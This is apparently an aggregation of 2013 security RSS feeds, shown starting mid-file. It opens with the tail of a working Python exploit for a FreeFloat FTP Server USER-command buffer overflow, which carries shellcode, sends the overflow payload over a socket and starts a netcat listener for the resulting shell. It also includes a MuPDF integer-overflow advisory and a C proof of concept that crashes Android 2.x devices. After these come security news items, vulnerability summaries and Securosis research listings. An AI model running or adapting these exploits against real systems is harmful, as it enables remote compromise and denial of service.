"\x93\x74\x47\xb1\x82\xd0\x26\xce\xd5\xbd\x97\x6a\x9d\x2c" + "\xc3\x0c\xfc\x38\x20\x22\xff\xb8\x2e\x35\x8c\x8a\xf1\xed" + "\x1a\xa7\x7a\x2b\xdc\xc8\x50\x8b\x72\x37\x5b\xeb\x5b\xfc" + "\x0f\xbb\xf3\xd5\x2f\x50\x04\xd9\xe5\xf6\x54\x75\x56\xb6" + "\x04\x35\x06\x5e\x4f\xba\x79\x7e\x70\x10\x0c\xb9\xe7\x5b" + "\xa7\x44\x78\x33\xba\x46\x69\x98\x33\xa0\xe3\x30\x12\x7b" + "\x9c\xa9\x3f\xf7\x3d\x35\xea\x9f\xde\xa4\x71\x5f\xa8\xd4" + "\x2d\x08\xfd\x2b\x24\xdc\x13\x15\x9e\xc2\xe9\xc3\xd9\x46" + "\x36\x30\xe7\x47\xbb\x0c\xc3\x57\x05\x8c\x4f\x03\xd9\xdb" + "\x19\xfd\x9f\xb5\xeb\x57\x76\x69\xa2\x3f\x0f\x41\x75\x39" + "\x10\x8c\x03\xa5\xa1\x79\x52\xda\x0e\xee\x52\xa3\x72\x8e" + "\x9d\x7e\x37\xbe\xd7\x22\x1e\x57\xbe\xb7\x22\x3a\x41\x62" + "\x60\x43\xc2\x86\x19\xb0\xda\xe3\x1c\xfc\x5c\x18\x6d\x6d" + "\x09\x1e\xc2\x8e\x18") sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: sock.connect((target,21)) print "\n\n[-] Sending exploit ..." print sock.recv(2000) sock.send("USER "+junk+eip+nops+payload+"\r\n") sock.close() os.system("nc -lvp 4444") except: print "[-] Connection to "+target+" failed! \n" sys.exit(0) root=Tkinter.Tk() root.geometry("%dx%d" %(700,375)) root.title("*** FreeFloat FTP Server Remote Code Execution USER Command Buffer Overflow***") root['bg'] = 'black' developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom') ip_answer=Tkinter.Label(text="IP Address ").pack() ip=Tkinter.StringVar() ip_entry=Tkinter.Entry(textvariable=ip).pack() exploit=Tkinter.Button(text="Exploit",command=exploit).pack() root.mainloop()

==> Sumatra 2.1.1/MuPDF 1.0 Integer Overflow

http://rss.feedsportal.com/c/32479/f/477548/index.rss Sumatra 2.1.1/MuPDF 1.0 Integer Overflow
There is an integer overflow on the MuPDF in the lex_number() function which can be triggered using a corrupt PDF file with ObjStm. I'm attaching a file that reproduces the problem with the original unmodified file. The ObjStm was modified to include big numbers. The easy way to fix is to update to the latest version of MuPDF library. Affected products ================= MuPDF 1.0 (previous release) MuPDF for iOS 1.1 (current release) Sumatra 2.1.1 (current stable release) Fixed ===== MuPDF 1.1 http://git.ghostscript.com/?p=mupdf.git;a=commitdiff;h=f919270b6a732ff45c3ba2d0c105e2b39e9c9bc9 Sumatra Pre-release version: http://blog.kowalczyk.info/software/sumatrapdf/prerelease.html CVE ==== CVE-2012-5340 Flaw details ============ On the FIXME line occurs an integer overflow, which can be later abused to write to memory: File: pdf_lex.c static int lex_number(fz_stream *f, pdf_lexbuf *buf, int c) { ..... while (1) { int c = fz_read_byte(f); switch (c) { case '.': goto loop_after_dot; case RANGE_0_9: i = 10*i + c - '0'; /* FIXME: Need overflow check here; do we care? */ break; default: fz_unread_byte(f); /* Fallthrough */ case EOF: if (neg) i = -i; buf->i = i; return PDF_TOK_INT; } } .... file: pdf_repair.c static void pdf_repair_obj_stm(pdf_document *xref, int num, int gen) { .... for (i = 0; i < count; i++) { tok = pdf_lex(stm, &buf); if (tok != PDF_TOK_INT) fz_throw(ctx, "corrupt object stream (%d %d R)", num, gen); n = buf.i; // n can take negative values when an integer overflow occurs if (n >= xref->len) pdf_resize_xref(xref, n + 1); xref->table[n].ofs = num; // Writes xref->table[n].gen = i; xref->table[n].stm_ofs = 0; POC ==== Attached proof of concept. http://www.exploit-db.com/sploits/23246.tar.gz !Exploitable output =================== MuPDF: Description: User Mode Write AV Short Description: WriteAV Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at mupdf+0x000000000003e1a6 (Hash=0x0e1a1f61.0x5f702654) User mode write access violations that are not near NULL are exploitable. Sumatra: SumatraPDF!pdf_repair_obj_stms+0x94 SumatraPDF!pdf_open_document_with_stream+0x2c3 SumatraPDF!PdfEngineImpl::LoadFromStream+0xaa SumatraPDF!PdfEngineImpl::Load+0x179 SumatraPDF!PdfEngine::CreateFromFile+0x80 SumatraPDF!EngineManager::CreateEngine+0x82 SumatraPDF!LoadDocIntoWindow+0x266 SumatraPDF!LoadDocumentOld+0x41f SumatraPDF!LoadDocument+0xc SumatraPDF!LoadOnStartup+0x89 SumatraPDF!WinMain+0x57c SumatraPDF!__tmainCRTStartup+0x142 SumatraPDF!WinMainCRTStartup+0xf kernel32!BaseThreadInitThunk+0x12 ntdll32!RtlInitializeExceptionChain+0x63 ntdll32!RtlInitializeExceptionChain+0x36 Instruction Address: 0x00000000775315de Description: User Mode Write AV Short Description: WriteAV Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll32!ZwRaiseException+0x0000000000000012 (Hash=0x16621b14.0x14396738) User mode write access violations that are not near NULL are

==> Android Kernel 2.6 Local DoS Crash PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss # Exploit Title: Android Kernel 2.6 Local DoS # Date: 12/7/12 # Author: G13 # Twitter: @g13net # Versions: Android 2.2, 2.3 # Category: DoS (android) # ##### Vulnerability ##### The Android OS is vulnerable to a local DoS when a filename with a length of 2048 or larger is attempted to be written to the sdcard(vfat fs) multiple times. The result of successful running of the exploit code is the system restarting. The vulnerability only effects Android kernels that are in the version 2.6 family. ##### Vendor Timeline ##### The Android Security Team has been contacted with updated PoC code and details. They have been aware of this vulnerability for over a year. ##### Tombstone ##### * * * * * * * * * * * * * * * * Build fingerprint: 'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys' pid: 349, tid: 363, name: SensorService >>> system_server <<< signal 8 (SIGFPE), code -6 (?), fault addr 0000015d r0 00000000 r1 00000008 r2 00000040 r3 00000000 r4 2a114310 r5 00000000 r6 51504690 r7 00000025 r8 2a114330 r9 2a114350 sl 00000003 fp 00000003 ip fffd4084 sp 51501eb0 lr 40039b70 pc 40037cf0 cpsr 20030010 d0 4271bc7bd0b80000 d1 0000000000000000 d2 0000000000000000 d3 427181eae9200000 d4 0000000000000000 d5 0000000000000000 d6 0000000000000000 d7 0000000000000000 d8 0000000000000000 d9 0000000000000000 d10 0000000000000000 d11 0000000000000000 d12 0000000000000000 d13 0000000000000000 d14 0000000000000000 d15 0000000000000000 d16 3fe99999a0000000 d17 3fe999999999999a d18 0033003200310030 d19 0000000000000000 d20 3fc554e7eb0eb47c d21 3e66376972bea4d0 d22 3f4de16b9c24a98f d23 3fb0f4a31edab38b d24 3fede16b9c24a98f d25 3fe55559ee5e69f9 d26 0000000000000000 d27 0000000000000000 d28 0000000000000005 d29 0000000000000000 d30 0000000000000000 d31 0000000000000000 scr 20000010 backtrace: #00 pc 0000dcf0 /system/lib/libc.so (kill+12) #01 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #02 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #03 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #04 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #05 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #06 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #07 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #08 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #09 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #10 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #11 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #12 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #13 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #14 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #15 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #16 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) ##### PoC ##### #include <stdio.h> int main(int argc, char** argv) { char buf[5000]; int j,k; FILE *fp; /* Path to sdcard, typically /sdcard/ */ strcpy(buf,"/sdcard/"); for(k=0;k<=2048;k++){ strcat(buf,"A"); }; for(j=0;j<=50;j++){ fp=fopen(buf,"w"); }; return 0; }

==> MySQL 5.1.53 Privilege Escalation Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : MySQL 5.1.53

==> MySQL 5.5.19 Heap-based BoF Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : MySQL 5.5.19

==> MySQL 5.5.19 Stack-based BoF Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : MySQL 5.5.19

==> FreeFTPD Remote Authentication Bypass Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : FreeFTPD

==> IBM System Director RCE Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : IBM System Director 5.20.3 Service Update 2

==> Cybergang plans to use Trojan against U.S. banks

http://rss.techtarget.com/981.xml A cybergang in Eastern Europe revealed plans to attack U.S. banks with a Gozi-like Trojan, according to RSA. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Improved Shylock Trojan targets banking users

http://rss.techtarget.com/981.xml The latest variant of the banking Trojan is causing numerous problems, Symantec said. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Tilon financial malware targets banks via MitB attack, Trusteer finds

http://rss.techtarget.com/981.xml Tilon is related to the Silon malware detected in 2009. It uses a man-in-the-browser attack to capture form submissions and steal credentials. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Citadel malware toolkit going underground, says RSA

http://rss.techtarget.com/981.xml The Citadel crimeware, a toolkit giving cybercriminals sophisticated financial malware, is being taken off the market by its authors, according to experts monitoring its activity. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Tinba banking Trojan sniffs network traffic, steals data

http://rss.techtarget.com/981.xml Tinba is among the smallest data-stealing banking Trojans discovered in the wild, according to Danish security firm CSIS Security Group. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Ramnit worm variant now dangerous banking malware

http://rss.techtarget.com/981.xml The Ramnit worm now supports man-in-the-middle attacks, giving cybercriminals the ability to drain a victims bank account. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> SIEM vendors make the case for extending SIEM product capabilities

http://rss.techtarget.com/981.xml Advanced features can reduce the threat of wire fraud. New rule sets can be shared among banks and credit unions. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> PHEARCON Call For Papers

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 05 Forwarded from: AA <anarchy.ang31 (at) gmail.com> ::[ About ]:: http://www.phearcon.org PHEARCON is a hacking conference based in Milwaukee Wisconsin with the goal of bringing hackers together under one roof to learn, hack, and party! ::[ When / Where ]:: October 12th @ 10am [-]location[-] Bucketworks 706 S 5th St. Milwaukee, WI. 53204 ::[ Format ]:: One main track that will host 8 50-60 minute talks. One turbo track that will host 8...

==> Surprise Visitors Are Unwelcome At The NSA's Unfinished Utah Spy Center (Especially When They Take Photos)

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 05 http://www.forbes.com/sites/kashmirhill/2013/03/04/nsa-utah-data-center-visit/ By Kashmir Hill Forbes Staff Forbes.com 03/04/2013 Most people who visit Salt Lake City in the winter months are excited about taking advantage of the areas storied slopes. While skiing was on my itinerary last week, I was more excited about an offbeat tourism opportunity in the area: I wanted to check out the construction site for the countrys biggest...

==> Gang arrested for hacking Dubai exchange companies' accounts

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 05 http://gulfnews.com/news/gulf/uae/crime/gang-arrested-for-hacking-dubai-exchange-companies-accounts-1.1153543 By Bassma Al Jandaly Senior Reporter GulfNews.com March 3, 2013 Dubai: The Dubai Police have arrested a cyber crime gang who were able to transfer more than Dh7 million from exchange companies in Dubai, a senior official from Dubai Police said. Major General Khamis Matter Al Mazeina, acting chief of Dubai Police, said on Sunday that...

==> Ex-Exel president found guilty of hacking former employers

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 05 http://www.theregister.co.uk/2013/03/05/exel_president_guilty_hacking/ By Iain Thomson in San Francisco The Register 5th March 2013 The former president of transportation logistics firm Exel has been found guilty of hacking into the servers of his former employer to glean secrets for his new business. A federal jury found Michael Musacchio, 61, guilty of one felony count of conspiracy to make unauthorized access to a protected computer...

==> BofA Confirms Third-Party Breach

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 05 http://www.bankinfosecurity.com/bofa-confirms-third-party-breach-a-5582 By Tracy Kitten Bank Info Security March 5, 2013 Hacktivists are taking credit for a data breach impacting Bank of America - an incident the hackers claim allowed them to access employee and executive data stored through a third party. "The data was retrieved from an Israeli server in Tel Aviv," says the hacktivist group Par:AnoIA, part of the Anonymous...

==> MND website and China Military Online attacked by overseas hackers 144, 000-odd times per month

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 03 http://english.peopledaily.com.cn/90786/8151567.html By Pang Qingjie and Lv Desheng China Military Online March 04, 2013 Geng Yansheng, director of the Information Affairs Bureau of the Ministry of National Defense (MND) of the People's Republic of China (PRC) and spokesman of the MND, said at the regular press conference of the MND held on February 28, 2013 in Beijing that the Chinese People's Liberation Army (PLA) has never...

==> Prepare for 'post-crypto world', warns godfather of encryption

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 03 http://www.theregister.co.uk/2013/03/01/post_cryptography_security_shamir/ By John Leyden The Register 1st March 2013 Cryptography is 'becoming less important' because of state-sponsored malware, according to one of the founding fathers of public-key encryption. Turing award-winning cryptographer Adi Shamir (the S in RSA) said the whole basis of modern cryptography is under severe strain from attacks on security infrastructure...

==> CIO weighs the dilemma of medical device FDA security updates

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 03 http://healthitsecurity.com/2013/02/27/cio-weighs-the-dilemma-of-medical-device-security-updates/ By Patrick Ouellette Health IT Security February 27, 2013 As John D. Halamka, MD, is CIO of Beth Israel Deaconess Medical Center (BIDMC), notes in a recent blog post, dealing with medical device security can certainly be a hassle for CIOs on a number of levels. One of the major barriers in securing these devices is the fact that many healthcare...

==> Evernote resets user passwords after being hit by "coordinated" hack

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 03 http://arstechnica.com/security/2013/03/evernote-resets-all-user-passwords-after-coordinated-breach-attempt/ By Nathan Mattise Ars Technica Mar 2 2013 Evernote is requiring each of its 50 million users to reset their login credentials after the site's security team detected a security breach that exposed password data and other personal information. In a security notice published Saturday, Evernote said the precautionary password reset...

==> Ankit Fadia Revealed

http://seclists.org/rss/isn.rss Posted by InfoSec News on Feb 25 http://forbesindia.com/article/beyond-business/ankit-fadia-revealed/34793/0 By Charles Assisi Forbes India FEATURES/BEYOND BUSINESS Feb 26, 2013 Dear Ankit Fadia, First of all, Id like to place my unconditional apologies on the record. In fact, before I started to write you this letter, I promised my colleagues these pages will be used to crucify and call your bluff before your 16th book on computer security hits the shelves a few months...

==> DHS bigwig 'adamantly opposed' to degree fetishism

http://seclists.org/rss/isn.rss Posted by InfoSec News on Feb 25 http://www.theregister.co.uk/2013/02/26/no_degree_needed_for_infosec_pros/ By Jack Clark in San Francisco The Register 26th February 2013 RSA 2013 HR and in-house recruitment types should get rid of the myopic idea that to work in IT you must have been to university, says a Department of Homeland Security honcho. Many "corporate and government jobs actually require a college degree or equivalent work experience," DHS deputy...

==> Hacking Victim Bit9 Blames SQL Injection Flaw

http://seclists.org/rss/isn.rss Posted by InfoSec News on Feb 25 http://www.cio.com/article/729401/Hacking_Victim_Bit9_Blames_SQL_Injection_Flaw By Jeremy Kirk IDG News Service February 25, 2013 Bit9 said a common Web application vulnerability was responsible for allowing hackers to ironically use the security vendor's systems as a launch pad for attacks on other organizations. Based in Waltham, Massachusetts, the company sells a security platform that is designed in part to stop hackers from...

==> A New Cold War, in Cyberspace, Tests U.S. Ties to China

http://seclists.org/rss/isn.rss Posted by InfoSec News on Feb 25 http://www.nytimes.com/2013/02/25/world/asia/us-confronts-cyber-cold-war-with-china.html By DAVID E. SANGER The New York Times February 24, 2013 WASHINGTON -- When the Obama administration circulated to the nations Internet providers last week a lengthy confidential list of computer addresses linked to a hacking group that has stolen terabytes of data from American corporations, it left out one crucial fact: that nearly every one of the...

==> Server hack prompts call for cPanel customers to take "immediate action"

http://seclists.org/rss/isn.rss Posted by InfoSec News on Feb 25 http://arstechnica.com/security/2013/02/server-hack-prompts-call-for-cpanel-customers-to-take-immediate-action/ By Dan Goodin Ars Technica Feb 22 2013 The providers of the cPanel website management application are warning some users to immediately change their systems' root or administrative passwords after discovering one of its servers has been hacked. In an e-mail sent to customers who have filed a cPanel support request in the past...

==> Cyber Security Awareness Month

http://securitysumo.wordpress.com/feed/ The Internet Storm Center is offering daily tips on cyber-security, and specifically on incident handling, for the month of October. Check out the link to catch up on the daily tips or submit your own. Posted in Internet Security

==> Apple OS X Root Privilege Vulnerability

http://securitysumo.wordpress.com/feed/ If you are a Mac user, and haven’t seen the latest security vulnerability for OS X yet, Macshadows has an excellent writeup, with a temporary solution. Essentially, you need to open a terminal window and paste the following command: sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent After you press return, you will be prompted for your password. This [...]

==> Portable and Cross-platform Personal Password Manager

http://securitysumo.wordpress.com/feed/ Having to change between two different platforms (Windows and OS X), I wanted a functional password manager that was both portable and cross-platform. KeePass fits this requirement, and even has a Linux port and several other versions, as well. KeePass is open source and free. Download the portable apps version of KeePass here, and the [...]

==> Revision3 Denial of Service Attack

http://securitysumo.wordpress.com/feed/ Revision3 spent the Memorial Day weekend fighting off a denial of service attack. Their blog post summarizes the shocking and angering results. Check it out.

==> I Will Derive …

http://securitysumo.wordpress.com/feed/ One of the funniest videos I have seen in a while (at least from my totally nerd viewpoint):

==> MacBook Pro Hard Drive Replacement

http://securitysumo.wordpress.com/feed/ I upgraded the hard drive in my MacBook Pro today. It went pretty well, but is not really for the easily technological-intimidated! I followed (for the most part) the guide at ifixit. I ran into a few things that their guide didn’t include, so I thought I would add my experience here. First, as you [...]

==> MacBook and MacBook Pro USB Ports

http://securitysumo.wordpress.com/feed/ This week on MacBreak Weekly ( Episode 88 ) one of the hosts was having sound problems with a USB headset. They discussed the problem and one of the other hosts suggested changing the port the headset is on. A short discussion followed and here are the results. The MacBook has two USB ports on [...]

==> VMWare Fusion 2 Beta and Backtrack Wireless

http://securitysumo.wordpress.com/feed/ If you are trying to use VMWare Fusion 2.0 Beta and anything wireless in Backtrack, you might want to wait until the next release. I had all different kinds of trouble getting wireless USB dongles working with the setup. First Kismet would quit because of a TCP error. Then I had several kernel panics. Going [...]

==> What’s on my USB key?

http://securitysumo.wordpress.com/feed/ I’ve gathered many programs for my USB memory stick so I thought I would list them here. Actually, when you get down to it, I have a couple of memory sticks I keep with me most of the time. The first one is an older stick and is only 256 mb. However, it has a [...]

==> Ubuntu 8.04, VMWare Server, Wine and Warcraft, DVD Playback

http://securitysumo.wordpress.com/feed/ I installed the latest Ubuntu (8.04) last weekend and have been playing around with it a bit this week. Wow, is it nice! It is noticeably quicker than my 7.10 install. Of course, I did a complete wipe and reinstall, so that probably has something to do with the speed. I installed VMWare Server as [...]

==> Oracle Java multiple security vulnerabilities, updated since 11.02.2013

http://securityvulns.com/informer/rss.asp?l=EN ~50 of different vulnerabilities are fixed with CPU. Applications: JRE 6, JDK 6, JDK 7, JRE 7 (05.03.2013)

==> Adobe Reader / Acrobat security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Buffer oveflows are exploited in-the-wild. Applications: Reader 10.1, Acrobat 10.1, Reader 9.5, Reader 11.0, Acrobat 9.5, Acrobat 11.0 (03.03.2013)

==> Adobe Flash Player multiple security vulnerabilities, updated since 14.02.2013

http://securityvulns.com/informer/rss.asp?l=EN Multiple code execution vulnerabilities are exploited in-the-wild. Applications: Flash Player 11.5 (03.03.2013)

==> Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

http://securityvulns.com/informer/rss.asp?l=EN PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc. Applications: django 1.4, PHP-Fusion 7.02, Piwigo 2.4, Geeklog 1.8, Question2Answer 1.5, rubygems fileutils 0.7, Joomla! 3.0, Joomla! 2.5, Maven 3.0, fusionforge 5.0, Fusion 4.51 (03.03.2013)

==> Cisco Prime Central / Cisco Unified Communications Manager / Cisco Unified Presence Server DoS

http://securityvulns.com/informer/rss.asp?l=EN Different DoS conditions on traffic processing. Applications: Unified Presence Server 8.6, Unified Presence Server 9.0, Unified Presence Server 9.1, Prime Central for Hosted Collaboration Solution 8.6, Prime Central for Hosted Collaboration Solution 9.0, Unified Communications Manager 9.1 (03.03.2013)

==> Airvana HubBub routers crossite scripting

http://securityvulns.com/informer/rss.asp?l=EN Web interface crossite scripting. Applications: HubBub C1-600-RT (03.03.2013)

==> SAP applications multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Code executions, filesystem access, information leakage, DoS. (03.03.2013)

==> War FTP Daemon memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on logging. Applications: War FTP Daemon 1.82 (02.03.2013)

==> Photodex ProShow Producer buffer overflow, updated since 18.02.2013

http://securityvulns.com/informer/rss.asp?l=EN Buffer overflow on .pxs / .pxt files parsing. Applications: ProShow Producer 5.0 (02.03.2013)

==> openjpeg library security vulnerabilities, updated since 16.07.2012

http://securityvulns.com/informer/rss.asp?l=EN Vulnerabilities on JPEG encoding and decoding. Applications: openjpeg 1.3 (02.03.2013)

==> Transmission memory corruption

http://securityvulns.com/informer/rss.asp?l=EN micro transport packets parsing memory corruption Applications: Transmission 2.61 (02.03.2013)

==> Apache security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN mod_info, mod_status, mod_imagemap, mod_ldap, mod_proxy_ftp, mod_proxy_balancer crossite scripting Applications: Apache 2.2, Apache 2.4 (02.03.2013)

==> Linux kernel security vulnerabilities, updated since 14.02.2013

http://securityvulns.com/informer/rss.asp?l=EN Privilege escalation, information leak. Applications: kernel 2.6, kernel 3.4 (02.03.2013)

==> D-Link DIR-645 unauthroized access

http://securityvulns.com/informer/rss.asp?l=EN It's possible to obtain administration password without authentication. Applications: D-Link DIR-645 (02.03.2013)

==> OpenSSL / PolarSSL / GnuTLS security vulnerabilities, updated since 14.02.2013

http://securityvulns.com/informer/rss.asp?l=EN Timing attacks, DoS. Applications: OpenSSL 1.0, PolarSSL 1.2, GnuTLS 2.12 (02.03.2013)

==> dbus-glib privilege escalation

http://securityvulns.com/informer/rss.asp?l=EN NameOwnerChanged signale processing privilege escalation Applications: dbus-glib 0.100 (02.03.2013)

==> PHP securiy vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN safe_dir protection bypass and code execution on SOAP handling. Applications: PHP 5.3 (02.03.2013)

==> sudo protection bypass

http://securityvulns.com/informer/rss.asp?l=EN It's possible to bypass password request by manipulating timestamps. Applications: sudo 1.8 (02.03.2013)

==> RSA Authentication Agent protection bypass

http://securityvulns.com/informer/rss.asp?l=EN In some cases only PIN is requested insted of full authentication sequence. Applications: RSA Authentication Agent 7.1 (02.03.2013)

==> cfingerd buffer overflow

http://securityvulns.com/informer/rss.asp?l=EN Buffer overflow on request parsing. Applications: cfingerd 1.4 (02.03.2013)

==> Data Security

http://securosis.com/feeds/research If you really think about it, technically all of “information security” is “data security”, but the reality is that most of our industry is focused on protecting networks and hosts, and very little is dedicated to protecting the information assets themselves. We here at Securosis prefer the term “Information-Centric Security”, since information is data with value (as opposed to just a bunch of 0’s and 1’s), but we know “data security” is more commonly used, and we’re not about to fight the industry. Since data security encompasses a wide range of tools, technologies, and processes we will highlight top-level management issues on this page, and encourage you to explore the subtopics for more details on database security, DLP, encryption, and other specific areas. We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it’s added to help you find changes more easily. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on data security is the following: The Business Justification for Data Security. We recommend you download the white paper as it provides a condensed (and professionally edited) review, and here are the links to the individual blog posts to add additional color and commentary: Part 1, part 2, part 3, part 4, part 5, and part 6. (03/09). 2. Tokenization vs. Encryption: Options for compliance. This paper outlines the business uses for tokenization, and examines the tradeoffs between tokenization and traditional encryption. 3. Next, you should read our series of posts on the Data Security Lifecycle which shows how all the various bits and pieces plug in together. Keep in mind that some of these technologies aren’t completely available yet, but the series should give you a good overview of how to take a big picture approach to data security. Start with the Lifecycle, then read the details on the technologies, organized by phase: Part 1, Part 2, Part 3. 4. The general principles of Information-centric/Data Security. 5. Data Verification Issues. 6. Data And Application Security Will Drive Most Security Growth For The Next 3-5 Years. 7. Defensive Security Stack; showing where data security fits in with network, host, and application security (I mention CMF, which is the same as DLP): Data Protection - it’s More than A + B + C. 8. We believe that two existing technologies are evolving into the “core” of data security-Data Loss Prevention and Database Activity Monitoring. The are evolving into what we call Content Monitoring and Protection (DLP, for protecting productivity applications and communications), and Application and Database Monitoring and Protection (DAM, for protecting applications and the data center). We define both technologies in Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection. 9. Continuation of Content Monitoring and Protection: How Data Loss Prevention and Database Activity Monitoring Will Connect. 10. Data classification comes up all the time when discussing data security. Here’s an overview that starts to introduce the idea of practical data classification: The Five Problems With Data Classification, an Introduction To Practical Data Classification. We followed it with a post: Practical Data Classification: Type 1, The Hasty Classification. But the truth is, classification is usually quite problematic,and we don’t recommend manual classification to most enterprise users, as we wrote in: Data Classification is Dead. (We haven’t finished our data classification series yet). 11. Related to data classification, here is a post on Information Governance. 12. Before you start digging in too deep on data security, we recommend you prepare by understanding your users and infrastructure, as we wrote in: Information-Centric Security Tip: Know Your Users and Infrastructure. 13. File Activity Monitoring is an exciting new technology that finally gives us insight into not only how are files are used, but who the heck is accessing them, should be accessing them, and when they violate security policies. We can finally do things like generate alerts when a sales guy starts sucking down all the customer files before moving to a competitor. General Coverage ------------ 1. Sorry, Data Labeling is Not the Same as DRM/ERM 2. Data Labels Suck. 3. Security Requirements for Electronic Medical Records. 4. The Data Breach Triangle. 5. Data Harvesting and Privacy. Presentations --------- These PDF versions of presentations may also be useful, although they don’t include any audio (for any audio/video, please see the next section). * This is the Business Justification for Data Security Presentation that Rich and Adrian provided in February 2009. * This presentation is on Mobile Data Security for the Enterprise. * Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle. * Here’s the current version of Pragmatic Data Security which provides a good, practical process overview with specific implementation details. * Presentation on Data Protection in the Enterprise. Kind of a corporate overview. * Presentation on XML Security. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Since data security is such a broad issue, please see the sub-categories for vendors and tools. If much of this material seems somewhat generic, that’s because data /information-centric security is a fairly high-level topic. We really encourage you to learn about the specifics in the sub-categories in the navigation menu. Subscribe to our daily email digest

==> Upcoming Research

http://securosis.com/feeds/research The Securosis Research Agenda is a dynamic entity. We are constantly revisiting our research plans, so check back often to see what’s in the hopper: * Understanding and Selecting a Web Application Firewall * SIEM 2.0: Replacing Your SIEM Solution * Securing Applications at Scale * Masking for Compliance * Code Security: Security for Developers * Pragmatic Data Security * Network Security Fundamentals * Endpoint Security Fundamentals * Database Security 2.0: Database Security for Relational and Non-relational Systems * Understanding and Implementing Network Segregation * Data Security for the Cloud Some of these papers will be sponsored, some won’t, but all will be released for free under a Creative Commons license on our blog and within the Research Library. Subscribe to our daily email digest

==> All Research Papers

http://securosis.com/feeds/research Application Security Securing Big Data: Recommendations for Securing Hadoop and NoSQL Pragmatic WAF Management: Giving Web Apps a Fighting Chance Building a Web Application Security Program Cloud and Virtualization Compliance Tokenization Guidance Tokenization vs. Encryption: Options for Compliance Data Encryption 101: A Pragmatic Approach to PCI Data Security Understanding and Selecting a Key Management Solution Pragmatic Key Management for Data Encryption Understanding and Selecting Data Masking Solutions Implementing and Managing a Data Loss Prevention Solution Defending Data on iOS Understanding and Selecting a Database Security Platform Understanding and Selecting a File Activity Monitoring Solution Database Activity Monitoring: Software vs. Appliance The Securosis 2010 Data Security Survey Understanding and Selecting a Tokenization Solution Understanding and Selecting a DLP Solution Understanding and Selecting a Database Encryption or Tokenization Solution Low Hanging Fruit: Quick Wins with Data Loss Prevention (V2.0) Database Assessment Content Discovery Whitepaper Selecting a Database Activity Monitoring Solution Endpoint Security The Endpoint Security Management Buyer’s Guide Endpoint Security Fundamentals Best Practices for Endpoint DLP Evolving Endpoint Malware Detection: Dealing with Advanced and Targeted Attacks Network Security Network-based Threat Intelligence: Searching for the Smoking Gun Defending Against Denial of Service (DoS) Attacks Network-based Malware Detection: Filling the Gaps of AV Applied Network Security Analysis: Moving from Data to Information Fact-Based Network Security: Metrics and the Pursuit of Prioritization Network Security in the Age of Any Computing Understanding and Selecting an Enterprise Firewall Project Quant Malware Analysis Quant Measuring and Optimizing Database Security Operations (DBQuant) Network Security Ops Quant Metrics Model Network Security Operations Quant Report Project Quant Survey Results and Analysis Project Quant Metrics Model Report Security Management Building an Early Warning System Implementing and Managing Patch and Configuration Management Vulnerability Management Evolution: From Tactical Scanner to Strategic Platform Watching the 